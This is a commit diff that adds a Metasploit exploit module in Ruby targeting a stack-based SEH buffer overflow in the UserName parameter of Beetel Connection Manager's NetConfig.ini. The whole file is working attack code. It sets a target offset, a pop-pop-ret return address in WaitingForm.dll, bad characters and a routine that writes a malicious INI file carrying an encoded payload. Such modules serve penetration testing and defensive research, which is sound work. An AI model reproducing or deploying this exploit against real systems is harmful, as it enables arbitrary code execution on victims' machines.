Add Beetel Connection Manager NetConfig.ini BOF

modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb

@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class Metasploit4 < Msf::Exploit
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow",
+      'Description' => %q{
+        This module exploits a stack-based buffer overflow in the UserName
+        parameter in the NetConfig.ini file for Beetel Connection Manager.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [
+        "metacom", # Vuln/PoC
+        "wvu" # Metasploit
+      ],
+      'References' => [
+        ["OSVDB", "98714"],
+        ["EDB", "28969"]
+      ],
+      'Payload' => {
+        "Space" => 1504,
+        "BadChars" => "\x00\x09\x0a\x0b\x0c\x0d\x20",
+        "DisableNops" => true
+      },
+      'Platform' => "win",
+      'Targets' => [
+        ["PCW_BTLINDV1.0.0B04 (WinXP SP3)", {
+          "Offset" => 468,
+          "Ret" => 0x0105e2f6 # p/p/r (WaitingForm.dll 1.0.0.0)
+        }]
+      ],
+      'Privileged' => false,
+      'DisclosureDate' => "Oct 12 2013",
+      'DefaultTarget' => 0
+    ))
+
+    register_options([
+      OptString.new("FILENAME", [true, "INI file", "NetConfig.ini"]),
+      OptString.new("SECTION", [true, "Section name", "Edit Me"])
+    ], self.class)
+  end
+
+  def exploit
+    section = datastore["SECTION"]
+
+    sploit = "[#{section}]\r\n" \
+             "UserName=#{shell_popper}"
+
+    file_create(sploit)
+  end
+
+  def shell_popper
+    junk = rand_text(target["Offset"])
+    seh = generate_seh_record(target.ret)
+    jump = Rex::Arch::X86.jmp_short(66)
+    padding = rand_text(66)
+
+    junk << seh << jump << padding << payload.encoded
+  end
+
+end